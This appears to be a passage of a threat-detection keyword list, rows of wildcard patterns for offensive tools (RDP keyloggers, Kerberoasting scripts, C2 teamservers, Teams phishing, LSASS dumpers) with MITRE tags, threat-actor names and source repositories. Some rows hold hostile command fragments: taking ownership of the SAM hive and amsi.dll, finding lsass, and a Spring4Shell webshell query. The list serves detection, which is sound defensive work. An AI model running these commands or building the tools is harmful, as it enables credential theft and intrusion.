menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_windows_*.exe*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*tailscale up --advertise-routes=*/24*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tailscaled --tun=userspace-networking --socks5-server=*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*take_shellcode.bat*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*TakeMyRDP*logfile.txt*,offensive_tool_keyword,TakeMyRDP,An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/nocerainfosec/TakeMyRDP2.0,1,1,N/A,N/A,1,95,8,2023-07-27T03:10:08Z,2023-07-03T12:48:49Z -*TakeMyRDP.cpp*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.exe*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.git*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.h*,offensive_tool_keyword,TakeMyRDP,An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/nocerainfosec/TakeMyRDP2.0,1,1,N/A,N/A,1,95,8,2023-07-27T03:10:08Z,2023-07-03T12:48:49Z -*TakeMyRDP.sln*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.vcxproj*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP2.0*,offensive_tool_keyword,TakeMyRDP,An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/nocerainfosec/TakeMyRDP2.0,1,1,N/A,N/A,1,95,8,2023-07-27T03:10:08Z,2023-07-03T12:48:49Z -*TakeMyRDP-main*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -"*takeown /f ""C:\windows\system32\config\SAM""*",greyware_tool_keyword,takeown,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*takeown /f C:\Windows\System32\amsi.dll /a*,greyware_tool_keyword,takeown,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*takeshixx/nmap-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*Taonn/EmailAll*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*target/tomcatwar.jsp?pwd=j&cmd=*,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,0,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*targetedKerberoast.git*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*targetedKerberoast.py*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*targetedkerberoast_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*targetedkerberoast_hashes_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*targetedkerberoast_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*targetedKerberoast-main*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*targetver.h*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*tarunkant/Gopherus*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tas389.ps1*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tasklist /fi *Imagename eq lsass.exe* | find *lsass*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -"*tasklist /svc | findstr /i ""vmtoolsd.exe""*",greyware_tool_keyword,tasklist,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*TaskShell.exe * -b *.exe*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,0,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z -*TaskShell.exe * -s *SYSTEM*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,0,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z -*tastypepperoni/PPLBlade*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*tastypepperoni/RunAsWinTcb*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*tcp://0.tcp.ngrok.io:*,greyware_tool_keyword,ngrok,ngrok - abused by attackers for C2 usage,T1090 - T1095 - T1008,TA0011 - TA0002 - TA0004,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*tcpClient.connectTCP(*127.0.0.1*1337*,offensive_tool_keyword,UsoDllLoader,This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ,T1210.001 - T1055 - T1574.001,TA0007 - TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/itm4n/UsoDllLoader,1,0,N/A,N/A,4,368,104,2020-06-06T11:05:12Z,2019-08-01T17:58:16Z -*tcpdump *,greyware_tool_keyword,tcpdump,A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,http://www.tcpdump.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tcpreplay*,offensive_tool_keyword,tcpreplay,Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.,T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://tcpreplay.appneta.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tcpshell.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*tdragon6/Supershell*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*teamserver* no_evasion.profile*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,0,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*teamServer*ZoomAPI.py*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*TeamServer.C2Profiles*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*TeamServer.exe *github.com*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*TeamServer.prop*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*TeamServer/Filters/InjectionFilters*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*TeamServer/Pivots/*.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*TeamServer\TeamServer.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*TeamsPhisher.git*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*teamsphisher.log*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*teamsphisher.py*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*TeamsPhisher-main.zip*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*teamstracker-main*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*teamviewer_passwords.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*teamviewer_passwords.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*techspence/ScriptSentry*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*tecknicaltom/dsniff*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well),T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*Teensypreter.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*telegram2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*TelegramRAT-main*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - 